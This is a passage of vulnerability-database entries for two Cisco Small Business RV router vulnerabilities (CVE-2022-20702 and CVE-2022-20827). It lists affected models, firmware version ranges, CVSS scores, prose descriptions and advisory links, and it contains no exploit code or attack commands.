         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.7,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Jeongun Baek of Diffense",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
      ],
      trust: 1.3,
   },
   cve: "CVE-2022-20702",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 9,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 8,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "Single",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 9,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2022-20702",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.2,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "HIGH",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.2,
                  baseSeverity: "High",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20702",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "High",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "HIGH",
                  attackVector: "LOCAL",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 7,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1,
                  id: "CVE-2022-20702",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "LOW",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "NONE",
                  vectorString: "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20702",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20702",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20702",
                  trust: 0.7,
                  value: "CRITICAL",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-163",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20702",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
      ],
      trust: 2.34,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20702",
            trust: 4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-420",
            trust: 2.4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15946",
            trust: 0.7,
         },
         {
            db: "CS-HELP",
            id: "SB2022020301",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   id: "VAR-202202-0326",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-02-13T22:30:10.538000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 0.7,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=183841",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-787",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 1.8,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-420/",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20702",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020301",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/787.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            date: "2023-05-11T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            date: "2022-02-10T18:15:09.137000",
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-420",
         },
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20702",
         },
         {
            date: "2023-05-11T09:08:00",
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
         {
            date: "2022-02-28T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
         {
            date: "2023-11-07T03:42:40.140000",
            db: "NVD",
            id: "CVE-2022-20702",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004938",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-163",
         },
      ],
      trust: 0.6,
   },
}

var-202208-0321
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business Router products include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from a attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0321",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv345",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv260w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv340",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv345p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.26",
         },
         {
            model: "rv160w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160 vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn ルータ with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340",
            scope: null,
            trust: 0.7,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
